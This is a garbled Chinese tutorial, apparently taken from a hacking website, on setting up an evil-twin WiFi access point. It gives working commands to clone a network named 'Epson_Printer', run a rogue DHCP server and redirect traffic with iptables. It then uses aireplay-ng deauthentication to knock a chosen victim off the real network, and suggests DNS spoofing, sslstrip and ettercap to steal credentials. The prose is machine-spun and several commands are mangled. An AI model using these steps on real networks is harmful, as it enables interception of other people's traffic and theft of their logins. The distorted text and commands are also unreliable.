涨姿势:无线密码入侵的一次wifi钓鱼!

admin
11310admin首席执行运营官
2016-12-13 23:34:48
11310 2016-12-13 23:34:48
用于数据包的嗅探和写入。
2. Backtrack大约Kali Linux: 冲击渠道
3.无线网络:保证该无线由用户使用,并且能操控这个无线接入点。
4.一个意图板滞:这个板滞可所以你的物理机大约编造机。本次实施中用到的是Windows 7 编造机

开端实施:创立一个地痞接入点
第一步:
发动编造机,挑选kali linux 。点击”修正编造机设置(Edit virtual machine settings)”,进入到“网络适配器(Network Adapter)”选项,在网络毗邻中挑选“桥接(Bridged)”:



第二步:
敞开kali 用root账户登录。
第三步:
毗邻条记本的无线网卡。保证在Removable Devices选项下的无线网卡选项前面有一个蓝色的对钩。要是没有,必要挑选无线网卡来让无线网卡从Windows系统停止开,毗邻到kali linux编造机,如下图所示:

第四步:
翻开终端,输入如下指令检查IP地址和网关。
 


在本例中,网关是192.168.0.1

第五步:
先是用以下指令列出悉数网卡列表,如下图:
能够看到一个姓名是wlan5的网卡,就是这个了。


第六步:


检查下用户附近的无线AP是否都可用,用如下指令,截图如下:
airodump-ng wlan5

这个指令后将会开端捕获数据包,并且把用户附近的拜访点列出来,此中BSSID是无线AP的MAC地址,Channel代表频率。细致PWR列的值,越靠近的路由器这个值越小。
 


第七步:
记下AP点的BSSID 和Channel的值。别的,还要记下意图设置配备布置的MAC地址。
在这个比如中,BISSID值是5E:F9:6A:29:28:18,Channel的值是2。意图板滞的MAC地址是68:5D:43:7D:F7:E9


第八步:

咱们有必要树立一个假的DHCP服务器来供给一个假的AP接入点。在kali中履行以下指令就能够创立一个DHCP:

apt-get install isc-dhcp-server
树立好后,修正DHCP配置文件,如下:

leafpad /etc/dhcpd.conf

authoraitative;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.1.0 netmask 255.255.255.0 {

option routers 192.168.1.1;

option subnet-mask 255.255.255.0;

option domain-name “Epson_Printer”;

option domain-name-servers 192.168.1.1;

range 192.168.1.2 192.168.1.40;

}
保留并封闭配置文件。
对/etc/dhcpd/dhcpd.conf文件重复上述操作。


第九步:

翻开终端,履行以下指令,创立一个ESSID名和受害者拜访AP类似的AP接入点,比如中咱们用“Epson_Printer”。

airbase-ng –e Epson_Printer -c 2 wlan5
l e 是AP接入点的ESSID(MAC地址)
l c是无线网络的频率
l Wlan5是网卡名
如今,名叫“Epson_Printer”的新的AP接入点创立完成。



第十步:

如今,咱们翻开一个新的终端,开端监控这个垂钓AP,履行如下指令:

airodump-ngbssid 00:C0:CA:70:8F:25 -C 2 wlan 5



第十一步:

检查第五步的发生的窗口,新建的AP接入点应该是能够看见的:



第十二步:

如今,咱们有必要向网络供给这个假的无线AP。翻开终端,顺次输入如下指令:

·  ifconfig at0 192.168.1.1 netmask 255.255.255.0

·  ifconfig at0 mtu 1400

·  route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

·  iptables –flush ·  iptables –table nat –flush ·  iptables –delete-chain ·  iptables –table nat –delete-chain ·  echo 1 > /proc/sys/net/ipv4/ip_forward

·  iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.0.1(gateway)

·  iptables -P FORWARD ACCEPT ·  iptables –append FORWARD –in-interface at0 -j ACCEPT ·  iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

·  iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000 ·  dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

·  /etc/init.d/isc-dhcp-server start





第十三步:

咱们能够等候别人衔接这个假的无线AP,也能够用de-authenticate进犯强行迫使咱们的方针从头衔接AP,这么咱们就能乘机抓包。
咱们能够用以下指令来履行:

aireplay-ngdeauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5
5E:F9:6A:29:28:18 是无线AP的MAC地址
 0 代表进行de-authentication.
 -c 是方针机器的MAC地址
 wlan5 是网卡
以下截图中能够看到,无线网卡正在发送de-authentication数据包给方针无线AP。方针机器就和“Epson_Printer” 衔接点断开了,并且开端测验从头衔接,如下图:



第十四步:

因为接连发送deauth包,客户端一向无法衔接到原来的无线AP,于是就开端测验衔接别的最强的无线AP,咱们的假AP信号很强,于是就开端连了。如下图:





第十五步:

检查airodump-ng指令窗口。能够在终端中检查到衔接的设备:


如今,受害者的设备现已衔接到咱们的假的无线AP中了。从这儿开端,进犯者能够实施各种手法,比如说DNS诈骗用户衔接一个假的网站,获取到用户认证信息,或许用 sslstrip 和ettercap 进行中间人进犯。
本文标题:涨姿势:无线密码入侵的一次wifi钓鱼!
本文作者:admin
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t235.html
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan